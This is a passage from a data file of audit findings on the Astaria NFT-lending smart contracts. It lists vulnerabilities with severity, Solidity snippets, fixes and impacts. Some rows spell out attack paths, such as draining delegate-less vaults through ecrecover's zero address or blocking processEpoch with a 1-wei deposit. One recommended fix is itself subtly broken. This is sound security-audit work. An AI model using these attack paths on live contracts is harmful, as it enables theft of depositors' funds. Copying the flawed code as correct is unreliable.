liens[i];\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN.getLien(lienId);\\n\\n if (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n} else {\\n //@audit-issue logic skipped if liens.length > 0\\n TRANSFER_PROXY.tokenTransferFrom(\\n weth,\\n payer,\\n COLLATERAL_TOKEN.ownerOf(tokenId),\\n transferAmount\\n );\\n}\\n```\\n" +Possible to fully block PublicVault.processEpoch function. No one will be able to receive their funds,high,"Possible to fully block `PublicVault.processEpoch` function. No one will be able to receive their funds\\nWhen liquidity providers want to redeem their share from `PublicVault` they call `redeemFutureEpoch` function which will create new `WithdrawProxy` for the epoch(if not created already) and then mint shares for redeemer in `WithdrawProxy`. `PublicVault` transfer user's shares to himself.\\n```\\n function redeemFutureEpoch(\\n uint256 shares,\\n address receiver,\\n address owner,\\n uint64 epoch\\n ) public virtual returns (uint256 assets) {\\n // check to ensure that the requested epoch is not the current epoch or in the past\\n require(epoch >= currentEpoch, ""Exit epoch too low"");\\n\\n\\n require(msg.sender == owner, ""Only the owner can redeem"");\\n // check for rounding error since we round down in previewRedeem.\\n\\n\\n ERC20(address(this)).safeTransferFrom(owner, address(this), shares);\\n\\n\\n // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch\\n _deployWithdrawProxyIfNotDeployed(epoch);\\n\\n\\n emit Withdraw(msg.sender, receiver, owner, assets, shares);\\n\\n\\n // WithdrawProxy shares are minted 1:1 with PublicVault shares\\n WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]\\n }\\n```\\n\\nThis function mints `WithdrawProxy` shares 1:1 to redeemed `PublicVault` shares. Then later after call of `processEpoch` and `transferWithdrawReserve` the funds will be sent to the `WithdrawProxy` and users can now redeem their shares from it.\\nFunction `processEpoch` decides how many funds should be sent to the `WithdrawProxy`.\\n```\\n if (withdrawProxies[currentEpoch] != address(0)) {\\n uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch])\\n .totalSupply();\\n\\n\\n liquidationWithdrawRatio = proxySupply.mulDivDown(1e18, totalSupply());\\n\\n\\n if (liquidationAccountants[currentEpoch] != address(0)) {\\n LiquidationAccountant(liquidationAccountants[currentEpoch])\\n .setWithdrawRatio(liquidationWithdrawRatio);\\n }\\n\\n\\n uint256 withdrawAssets = convertToAssets(proxySupply);\\n // compute the withdrawReserve\\n uint256 withdrawLiquidations = liquidationsExpectedAtBoundary[\\n currentEpoch\\n ].mulDivDown(liquidationWithdrawRatio, 1e18);\\n withdrawReserve = withdrawAssets - withdrawLiquidations;\\n // burn the tokens of the LPs withdrawing\\n _burn(address(this), proxySupply);\\n\\n\\n _decreaseYIntercept(withdrawAssets);\\n }\\n```\\n\\nThis is how it is decided how much money should be sent to WithdrawProxy. Firstly, we look at totalSupply of WithdrawProxy. `uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch]).totalSupply();`.\\nAnd then we convert them to assets amount. `uint256 withdrawAssets = convertToAssets(proxySupply);`\\nIn the end function burns `proxySupply` amount of shares controlled by PublicVault. `_burn(address(this), proxySupply);`\\nThen this amount is allowed to be sent(if no auctions currently, but this is not important right now).\\nThis all allows to attacker to make `WithdrawProxy.deposit` to mint new shares for him and increase totalSupply of WithdrawProxy, so `proxySupply` becomes more then was sent to `PublicVault`.\\nThis is attack scenario.\\n1.PublicVault is created and funded with 50 ethers. 2.Someone calls `redeemFutureEpoch` function to create new WithdrawProxy for next epoch. 3.Attacker sends 1 wei to WithdrawProxy to make totalAssets be > 0. Attacker deposit to WithdrawProxy 1 wei. Now WithdrawProxy.totalSupply > PublicVault.balanceOf(PublicVault). 4.Someone call `processEpoch` and it reverts on burning.\\nAs result, nothing will be send to WithdrawProxy where shares were minted for users. The just lost money.\\nAlso this attack can be improved to drain users funds to attacker. Attacker should be liquidity provider. And he can initiate next redeem for next epoch, then deposit to new WithdrawProxy enough amount to get new shares. And call `processEpoch` which will send to the vault amount, that was not sent to previous attacked WithdrawProxy, as well. So attacker will take those funds.",Make function WithdrawProxy.deposit not callable.,Funds of PublicVault depositors are stolen.,"```\\n function redeemFutureEpoch(\\n uint256 shares,\\n address receiver,\\n address owner,\\n uint64 epoch\\n ) public virtual returns (uint256 assets) {\\n // check to ensure that the requested epoch is not the current epoch or in the past\\n require(epoch >= currentEpoch, ""Exit epoch too low"");\\n\\n\\n require(msg.sender == owner, ""Only the owner can redeem"");\\n // check for rounding error since we round down in previewRedeem.\\n\\n\\n ERC20(address(this)).safeTransferFrom(owner, address(this), shares);\\n\\n\\n // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch\\n _deployWithdrawProxyIfNotDeployed(epoch);\\n\\n\\n emit Withdraw(msg.sender, receiver, owner, assets, shares);\\n\\n\\n // WithdrawProxy shares are minted 1:1 with PublicVault shares\\n WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]\\n }\\n```\\n" +Any public vault without a delegate can be drained,high,"If a public vault is created without a delegate, delegate will have the value of `address(0)`. This is also the value returned by `ecrecover` for invalid signatures (for example, if v is set to a position number that is not 27 or 28), which allows a malicious actor to cause the signature validation to pass for arbitrary parameters, allowing them to drain a vault using a worthless NFT as collateral.\\nWhen a new Public Vault is created, the Router calls the `init()` function on the vault as follows:\\n```\\nVaultImplementation(vaultAddr).init(\\n VaultImplementation.InitParams(delegate)\\n);\\n```\\n\\nIf a delegate wasn't set, this will pass `address(0)` to the vault. If this value is passed, the vault simply skips the assignment, keeping the delegate variable set to the default 0 value:\\n```\\nif (params.delegate != address(0)) {\\n delegate = params.delegate;\\n}\\n```\\n\\nOnce the delegate is set to the zero address, any commitment can be validated, even if the signature is incorrect. This is because of a quirk in `ecrecover` which returns `address(0)` for invalid signatures. A signature can be made invalid by providing a positive integer that is not 27 or 28 as the `v` value. The result is that the following function call assigns recovered = address(0):\\n```\\n address recovered = ecrecover(\\n keccak256(\\n encodeStrategyData(\\n params.lienRequest.strategy,\\n params.lienRequest.merkle.root\\n )\\n ),\\n params.lienRequest.v,\\n params.lienRequest.r,\\n params.lienRequest.s\\n );\\n```\\n\\nTo confirm the validity of the signature, the function performs two checks:\\n```\\nrequire(\\n recovered == params.lienRequest.strategy.strategist,\\n ""strategist must match signature""\\n);\\nrequire(\\n recovered == owner() || recovered == delegate,\\n ""invalid strategist""\\n);\\n```\\n\\nThese can be easily passed by setting the `strategist` in the params to `address(0)`. At this point, all checks will pass and the parameters will be accepted as approved by the vault.\\nWith this power, a borrower can create params that allow them to borrow the vault's full funds in exchange for a worthless NFT, allowing them to drain the vault and steal all the user's funds.",Issue Any public vault without a delegate can be drained\\nAdd a require statement that the recovered address cannot be the zero address:\\n```\\nrequire(recovered != address(0));\\n```\\n,All user's funds held in a vault with no delegate set can be stolen.,```\\nVaultImplementation(vaultAddr).init(\\n VaultImplementation.InitParams(delegate)\\n);\\n```\\n +"Auctions can end in epoch after intended, underpaying withdrawers",high,"When liens are liquidated, the router checks if the auction will complete in a future epoch and, if it does, sets up a liquidation accountant and other logistics to account for it. However, the check for auction completion does not take into account extended auctions, which can therefore end in an unexpected epoch and cause accounting issues, losing user funds.\\nThe liquidate() function performs the following check to determine if it should set up the liquidation to be paid out in a future epoch:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n\\nThis function assumes that the auction will only end in a future epoch if the `auctionWindow` (typically set to 2 days) pushes us into the next epoch.\\nHowever, auctions can last up to an additional 1 day if bids are made within the final 15 minutes. In these cases, auctions are extended repeatedly, up to a maximum of 1 day.\\n```\\nif (firstBidTime + duration - block.timestamp < timeBuffer) {\\n uint64 newDuration = uint256(\\n duration + (block.timestamp + timeBuffer - firstBidTime)\\n ).safeCastTo64();\\n if (newDuration <= auctions[tokenId].maxDuration) {\\n auctions[tokenId].duration = newDuration;\\n } else {\\n auctions[tokenId].duration =\\n auctions[tokenId].maxDuration -\\n firstBidTime;\\n }\\n extended = true;\\n}\\n```\\n\\nThe result is that there are auctions for which accounting is set up for them to end in the current epoch, but will actual end in the next epoch.",Change the check to take the possibility of extension into account:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow() + 1 days)\\n```\\n,"Users who withdrew their funds in the current epoch, who are entitled to a share of the auction's proceeds, will not be paid out fairly.",```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n +Strategists are paid 10x the vault fee because of a math error,high,"Strategists set their vault fee in BPS (x / 10,000), but are paid out as x / 1,000. The result is that strategists will always earn 10x whatever vault fee they set.\\nWhenever any payment is made towards a public vault, `beforePayment()` is called, which calls `_handleStrategistInterestReward()`.\\nThe function is intended to take the amount being paid, adjust by the vault fee to get the fee amount, and convert that amount of value into shares, which are added to `strategistUnclaimedShares`.\\n```\\nfunction _handleStrategistInterestReward(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n if (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000);\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n }\\n```\\n\\nSince the vault fee is stored in basis points, to get the vault fee, we should take the amount, multiply it by `VAULT_FEE()` and divide by 10,000. However, we accidentally divide by 1,000, which results in a 10x larger reward for the strategist than intended.\\nAs an example, if the vault fee is intended to be 10%, we would set `VAULT_FEE = 1000`. In that case, for any amount paid off, we would calculate `fee = amount * 1000 / 1000` and the full amount would be considered a fee for the strategist.",Change the `1000` in the `_handleStrategistInterestReward()` function to `10_000`.,"Strategists will be paid 10x the agreed upon rate for their role, with the cost being borne by users.","```\\nfunction _handleStrategistInterestReward(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n if (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000);\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n }\\n```\\n" +Claiming liquidationAccountant will reduce vault y-intercept by more than the correct amount,high,"When `claim()` is called on the Liquidation Accountant, it decreases the y-intercept based on the balance of the contract after funds have been distributed, rather than before. The result is that the y-intercept will be decreased more than it should be, siphoning funds from all users.\\nWhen `LiquidationAccountant.sol:claim()` is called, it uses its `withdrawRatio` to send some portion of its earnings to the `WITHDRAW_PROXY` and the rest to the vault.\\nAfter performing these transfers, it updates the vault's y-intercept, decreasing it by the gap between the expected return from the auction, and the reality of how much was sent back to the vault:\\n```\\nPublicVault(VAULT()).decreaseYIntercept(\\n (expected - ERC20(underlying()).balanceOf(address(this))).mulDivDown(\\n 1e18 - withdrawRatio,\\n 1e18\\n )\\n);\\n```\\n\\nThis rebalancing uses the balance of the `liquidationAccountant` to perform its calculation, but it is done after the balance has already been distributed, so it will always be 0.\\nLooking at an example:\\n`expected = 1 ether` (meaning the y-intercept is currently based on this value)\\n`withdrawRatio = 0` (meaning all funds will go back to the vault)\\nThe auction sells for exactly 1 ether\\n1 ether is therefore sent directly to the vault\\nIn this case, the y-intercept should not be updated, as the outcome was equal to the `expected` outcome\\nHowever, because the calculation above happens after the funds are distributed, the decrease equals `(expected - 0) * 1e18 / 1e18`, which equals `expected`\\nThat decrease should not happen, and causing problems for the protocol's accounting. For example, when `withdraw()` is called, it uses the y-intercept in its calculation of the `totalAssets()` held by the vault, creating artificially low asset values for a given number of shares.","The amount of assets sent to the vault has already been calculated, as we've already sent it. Therefore, rather than the full existing formula, we can simply call:\\n```\\nPublicVault(VAULT()).decreaseYIntercept(expected - balance)\\n```\\n\\nAlternatively, we can move the current code above the block of code that transfers funds out (L73).","Every time the liquidation accountant is used, the vault's math will be thrown off and user shares will be falsely diluted.","```\\nPublicVault(VAULT()).decreaseYIntercept(\\n (expected - ERC20(underlying()).balanceOf(address(this))).mulDivDown(\\n 1e18 - withdrawRatio,\\n 1e18\\n )\\n);\\n```\\n" +liquidationAccountant can be claimed at any time,high,"New liquidations are sent to the `liquidationAccountant` with a `finalAuctionTimestamp` value, but the actual value that is passed in is simply the duration of an auction. The `claim()` function uses this value in a require check, so this error will allow it to be called before the auction is complete.\\nWhen a lien is liquidated, `AstariaRouter.sol:liquidate()` is called. If the lien is set to end in a future epoch, we call `handleNewLiquidation()` on the `liquidationAccountant`.\\nOne of the values passed in this call is the `finalAuctionTimestamp`, which updates the `finalAuctionEnd` variable in the `liquidationAccountant`. This value is then used to protect the `claim()` function from being called too early.\\nHowever, when the router calls `handleLiquidationAccountant()`, it passes the duration of an auction rather than the final timestamp:\\n```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n\\nAs a result, `finalAuctionEnd` will be set to 259200 (3 days).\\nWhen `claim()` is called, it requires the final auction to have ended for the function to be called:\\n```\\nrequire(\\n block.timestamp > finalAuctionEnd || finalAuctionEnd == uint256(0),\\n ""final auction has not ended""\\n);\\n```\\n\\nBecause of the error above, `block.timestamp` will always be greater than `finalAuctionEnd`, so this will always be permitted.","Adjust the call from the router to use the ending timestamp as the argument, rather than the duration:\\n```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n block.timestamp + COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n","Anyone can call `claim()` before an auction has ended. This can cause many problems, but the clearest is that it can ruin the protocol's accounting by decreasing the Y intercept of the vault.\\nFor example, if `claim()` is called before the auction, the returned value will be 0, so the Y intercept will be decreased as if there was an auction that returned no funds.","```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n" +Incorrect fees will be charged,high,"If user has provided transferAmount which is greater than all lien.amount combined then initiatorPayment will be incorrect since it is charged on full amount when only partial was used as shown in poc\\nObserve the _handleIncomingPayment function\\nLets say transferAmount was 1000\\ninitiatorPayment is calculated on this full transferAmount\\n```\\nuint256 initiatorPayment = transferAmount.mulDivDown(\\n auction.initiatorFee,\\n 100\\n ); \\n```\\n\\nNow all lien are iterated and lien.amount is kept on deducting from transferAmount until all lien are navigated\\n```\\nif (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n```\\n\\nLets say after loop completes the transferAmount is still left as 100\\nThis means only 400 transferAmount was used but fees was deducted on full amount 500",Calculate the exact amount of transfer amount required for the transaction and calculate the initiator fee based on this amount,Excess initiator fees will be deducted which was not required,"```\\nuint256 initiatorPayment = transferAmount.mulDivDown(\\n auction.initiatorFee,\\n 100\\n ); \\n```\\n" +"isValidRefinance checks both conditions instead of one, leading to rejection of valid refinances",high,"`isValidRefinance()` is intended to check whether either (a) the loan interest rate decreased sufficiently or (b) the loan duration increased sufficiently. Instead, it requires both of these to be true, leading to the rejection of valid refinances.\\nWhen trying to buy out a lien from `LienToken.sol:buyoutLien()`, the function calls `AstariaRouter.sol:isValidRefinance()` to check whether the refi terms are valid.\\n```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n\\nOne of the roles of this function is to check whether the rate decreased by more than 0.5%. From the docs:\\nAn improvement in terms is considered if either of these conditions is met:\\nThe loan interest rate decrease by more than 0.5%.\\nThe loan duration increases by more than 14 days.\\nThe currently implementation of the code requires both of these conditions to be met:\\n```\\nreturn (\\n newLien.rate >= minNewRate &&\\n ((block.timestamp + newLien.duration - lien.start - lien.duration) >= minDurationIncrease)\\n);\\n```\\n",Change the AND in the return statement to an OR:\\n```\\nreturn (\\n newLien.rate >= minNewRate ||\\n ((block.timestamp + newLien.duration - lien.start - lien.duration) >= minDurationIncrease)\\n);\\n```\\n,Valid refinances that meet one of the two criteria will be rejected.,"```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n" +isValidRefinance will approve invalid refinances and reject valid refinances due to buggy math,high,"The math in `isValidRefinance()` checks whether the rate increased rather than decreased, resulting in invalid refinances being approved and valid refinances being rejected.\\nWhen trying to buy out a lien from `LienToken.sol:buyoutLien()`, the function calls `AstariaRouter.sol:isValidRefinance()` to check whether the refi terms are valid.\\n```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n\\nOne of the roles of this function is to check whether the rate decreased by more than 0.5%. From the docs:\\nAn improvement in terms is considered if either of these conditions is met:\\nThe loan interest rate decrease by more than 0.5%.\\nThe loan duration increases by more than 14 days.\\nThe current implementation of the function does the opposite. It calculates a `minNewRate` (which should be maxNewRate) and then checks whether the new rate is greater than that value.\\n```\\nuint256 minNewRate = uint256(lien.rate) - minInterestBPS;\\nreturn (newLien.rate >= minNewRate // rest of code\\n```\\n\\nThe result is that if the new rate has increased (or decreased by less than 0.5%), it will be considered valid, but if it has decreased by more than 0.5% (the ideal behavior) it will be rejected as invalid.",Flip the logic used to check the rate to the following:\\n```\\nuint256 maxNewRate = uint256(lien.rate) - minInterestBPS;\\nreturn (newLien.rate <= maxNewRate// rest of code\\n```\\n,Users can perform invalid refinances with the wrong parameters.\\nUsers who should be able to perform refinances at better rates will not be able to.,"```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n" +"new loans ""max duration"" is not restricted",medium,"document : "" Epochs PublicVaults operate around a time-based epoch system. An epoch length is defined by the strategist that deploys the PublicVault. The duration of new loans is restricted to not exceed the end of the next epoch. For example, if a PublicVault is 15 days into a 30-day epoch, new loans must not be longer than 45 days. "" but more than 2 epoch's duration can be added\\nthe max duration is not detected. add success when > next epoch\\n#AstariaTest#testBasicPublicVaultLoan\\n```\\n function testBasicPublicVaultLoan() public {\\n\\n IAstariaRouter.LienDetails memory standardLien2 =\\n IAstariaRouter.LienDetails({\\n maxAmount: 50 ether,\\n rate: (uint256(1e16) * 150) / (365 days),\\n duration: 50 days, /****** more then 14 * 2 *******/\\n maxPotentialDebt: 50 ether\\n }); \\n\\n _commitToLien({\\n vault: publicVault,\\n strategist: strategistOne,\\n strategistPK: strategistOnePK,\\n tokenContract: tokenContract,\\n tokenId: tokenId,\\n lienDetails: standardLien2, /**** use standardLien2 ****/\\n amount: 10 ether,\\n isFirstLien: true\\n });\\n }\\n```\\n","PublicVault#_afterCommitToLien\\n```\\n function _afterCommitToLien(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n // increment slope for the new lien\\n unchecked {\\n slope += LIEN_TOKEN().calculateSlope(lienId);\\n }\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN().getLien(lienId);\\n\\n uint256 epoch = Math.ceilDiv(\\n lien.start + lien.duration - START(),\\n EPOCH_LENGTH()\\n ) - 1;\\n\\n+ require(epoch <= currentEpoch + 1,""epoch max <= currentEpoch + 1"");\\n\\n liensOpenForEpoch[epoch]++;\\n emit LienOpen(lienId, epoch);\\n }\\n```\\n",Too long duration,"```\\n function testBasicPublicVaultLoan() public {\\n\\n IAstariaRouter.LienDetails memory standardLien2 =\\n IAstariaRouter.LienDetails({\\n maxAmount: 50 ether,\\n rate: (uint256(1e16) * 150) / (365 days),\\n duration: 50 days, /****** more then 14 * 2 *******/\\n maxPotentialDebt: 50 ether\\n }); \\n\\n _commitToLien({\\n vault: publicVault,\\n strategist: strategistOne,\\n strategistPK: strategistOnePK,\\n tokenContract: tokenContract,\\n tokenId: tokenId,\\n lienDetails: standardLien2, /**** use standardLien2 ****/\\n amount: 10 ether,\\n isFirstLien: true\\n });\\n }\\n```\\n" +_makePayment is logically inconsistent with how lien stack is managed causing payments to multiple liens to fail,medium,"`_makePayment(uint256, uint256)` looping logic is inconsistent with how `_deleteLienPosition` manages the lien stack. `_makePayment` loops from 0 to `openLiens.length` but `_deleteLienPosition` (called when a lien is fully paid off) actively compresses the lien stack. When a payment pays off multiple liens the compressing effect causes an array OOB error towards the end of the loop.\\n```\\nfunction _makePayment(uint256 collateralId, uint256 totalCapitalAvailable)\\n internal\\n{\\n uint256[] memory openLiens = liens[collateralId];\\n uint256 paymentAmount = totalCapitalAvailable;\\n for (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n }\\n}\\n```\\n\\n`LienToken.sol#_makePayment(uint256, uint256)` loops from 0 to `openLiens.Length`. This loop attempts to make a payment to each lien calling `_payment` with the current index of the loop.\\n```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, ""index out of bounds"");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n\\n`LienToken.sol#_deleteLienPosition` is called on liens when they are fully paid off. The most interesting portion of the function is how the lien is removed from the stack. We can see that all liens above the lien in question are slid down the stack and the top is popped. This has the effect of reducing the total length of the array. This is where the logical inconsistency is. If the first lien is paid off, it will be removed and the formerly second lien will now occupy it's index. So then when `_payment` is called in the next loop with the next index it won't reference the second lien since the second lien is now in the first lien index.\\nAssuming there are 2 liens on some collateral. `liens[0].amount = 100` and `liens[1].amount = 50`. A user wants to pay off their entire lien balance so they call `_makePayment(uint256, uint256)` with an amount of 150. On the first loop it calls `_payment` with an index of 0. This pays off `liens[0]`. `_deleteLienPosition` is called with index of 0 removing `liens[0]`. Because of the sliding logic in `_deleteLienPosition` `lien[1]` has now slid into the `lien[0]` position. On the second loop it calls `_payment` with an index of 1. When it tries to grab the data for the lien at that index it will revert due to OOB error because the array no long contains an index of 1.",Payment logic inside of `AuctionHouse.sol` works. `_makePayment` should be changed to mimic that logic.,Large payment are impossible and user must manually pay off each liens separately,"```\\nfunction _makePayment(uint256 collateralId, uint256 totalCapitalAvailable)\\n internal\\n{\\n uint256[] memory openLiens = liens[collateralId];\\n uint256 paymentAmount = totalCapitalAvailable;\\n for (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n }\\n}\\n```\\n" +LienToken._payment function increases users debt,medium,"LienToken._payment function increases users debt by setting `lien.amount = _getOwed(lien)`\\n`LienToken._payment` is used by `LienToken.makePayment` function that allows borrower to repay part or all his debt.\\nAlso this function can be called by `AuctionHouse` when the lien is liquidated.\\n```\\n function _payment(\\n uint256 collateralId,\\n uint8 position,\\n uint256 paymentAmount,\\n address payer\\n ) internal returns (uint256) {\\n if (paymentAmount == uint256(0)) {\\n return uint256(0);\\n }\\n\\n\\n uint256 lienId = liens[collateralId][position];\\n Lien storage lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n require(\\n block.timestamp < end || address(msg.sender) == address(AUCTION_HOUSE),\\n ""cannot pay off an expired lien""\\n );\\n\\n\\n address lienOwner = ownerOf(lienId);\\n bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n type(IPublicVault).interfaceId\\n );\\n\\n\\n lien.amount = _getOwed(lien);\\n\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n if (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n } else {\\n if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) {\\n // since the openLiens count is only positive when there are liens that haven't been paid off\\n // that should be liquidated, this lien should not be counted anymore\\n IPublicVault(lienOwner).decreaseEpochLienCount(\\n IPublicVault(lienOwner).getLienEpoch(end)\\n );\\n }\\n //delete liens\\n _deleteLienPosition(collateralId, position);\\n delete lienData[lienId]; //full delete\\n\\n\\n _burn(lienId);\\n }\\n\\n\\n TRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n\\n\\n emit Payment(lienId, paymentAmount);\\n return paymentAmount;\\n }\\n```\\n\\nHere lien.amount becomes lien.amount + accrued interests, because `_getOwed` do that calculation.\\n`lien.amount` is the amount that user borrowed. So actually that line has just increased user's debt. And in case if he didn't pay all amount of lien, then next time he will pay more interests.\\nExample. User borrows 1 eth. His `lien.amount` is 1eth. Then he wants to repay some part(let's say 0.5 eth). Now his `lien.amount` becomes `lien.amount + interests`. When he pays next time, he pays `(lien.amount + interests) + new interests`. So interests are acummulated on previous interests.",Issue LienToken._payment function increases users debt\\nDo not update lien.amount to _getOwed(lien).,User borrowed amount increases and leads to lose of funds.,"```\\n function _payment(\\n uint256 collateralId,\\n uint8 position,\\n uint256 paymentAmount,\\n address payer\\n ) internal returns (uint256) {\\n if (paymentAmount == uint256(0)) {\\n return uint256(0);\\n }\\n\\n\\n uint256 lienId = liens[collateralId][position];\\n Lien storage lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n require(\\n block.timestamp < end || address(msg.sender) == address(AUCTION_HOUSE),\\n ""cannot pay off an expired lien""\\n );\\n\\n\\n address lienOwner = ownerOf(lienId);\\n bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n type(IPublicVault).interfaceId\\n );\\n\\n\\n lien.amount = _getOwed(lien);\\n\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n if (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n } else {\\n if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) {\\n // since the openLiens count is only positive when there are liens that haven't been paid off\\n // that should be liquidated, this lien should not be counted anymore\\n IPublicVault(lienOwner).decreaseEpochLienCount(\\n IPublicVault(lienOwner).getLienEpoch(end)\\n );\\n }\\n //delete liens\\n _deleteLienPosition(collateralId, position);\\n delete lienData[lienId]; //full delete\\n\\n\\n _burn(lienId);\\n }\\n\\n\\n TRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n\\n\\n emit Payment(lienId, paymentAmount);\\n return paymentAmount;\\n }\\n```\\n" +_validateCommitment fails for approved operators,medium,"If a collateral token owner approves another user as an operator for all their tokens (rather than just for a given token), the validation check in `_validateCommitment()` will fail.\\nThe collateral token is implemented as an ERC721, which has two ways to approve another user:\\nApprove them to take actions with a given token (approve())\\nApprove them as an ""operator"" for all your owned tokens (setApprovalForAll())\\nHowever, when the `_validateCommitment()` function checks that the token is owned or approved by `msg.sender`, it does not accept those who are set as operators.\\n```\\nif (msg.sender != holder) {\\n require(msg.sender == operator, ""invalid request"");\\n}\\n```\\n","Include an additional check to confirm whether the `msg.sender` is approved as an operator on the token:\\n```\\n address holder = ERC721(COLLATERAL_TOKEN()).ownerOf(collateralId);\\n address approved = ERC721(COLLATERAL_TOKEN()).getApproved(collateralId);\\n address operator = ERC721(COLLATERAL_TOKEN()).isApprovedForAll(holder);\\n\\n if (msg.sender != holder) {\\n require(msg.sender == operator || msg.sender == approved, ""invalid request"");\\n }\\n```\\n",Approved operators of collateral tokens will be rejected from taking actions with those tokens.,"```\\nif (msg.sender != holder) {\\n require(msg.sender == operator, ""invalid request"");\\n}\\n```\\n" +"timeToEpochEnd calculates backwards, breaking protocol math",medium,"When a lien is liquidated, it calls `timeToEpochEnd()` to determine if a liquidation accountant should be deployed and we should adjust the protocol math to expect payment in a future epoch. Because of an error in the implementation, all liquidations that will pay out in the current epoch are set up as future epoch liquidations.\\nThe `liquidate()` function performs the following check to determine if it should set up the liquidation to be paid out in a future epoch:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n\\nThis check expects that `timeToEpochEnd()` will return the time until the epoch is over. However, the implementation gets this backwards:\\n```\\nfunction timeToEpochEnd() public view returns (uint256) {\\n uint256 epochEnd = START() + ((currentEpoch + 1) * EPOCH_LENGTH());\\n\\n if (epochEnd >= block.timestamp) {\\n return uint256(0);\\n }\\n\\n return block.timestamp - epochEnd;\\n}\\n```\\n\\nIf `epochEnd >= block.timestamp`, that means that there IS remaining time in the epoch, and it should perform the calculation to return `epochEnd - block.timestamp`. In the opposite case, where `epochEnd <= block.timestamp`, it should return zero.\\nThe result is that the function returns 0 for any epoch that isn't over. Since `0 < COLLATERAL_TOKEN.auctionWindow())`, all liquidated liens will trigger a liquidation accountant and the rest of the accounting for future epoch withdrawals.",Fix the `timeToEpochEnd()` function so it calculates the remaining time properly:\\n```\\nfunction timeToEpochEnd() public view returns (uint256) {\\n uint256 epochEnd = START() + ((currentEpoch + 1) * EPOCH_LENGTH());\\n\\n if 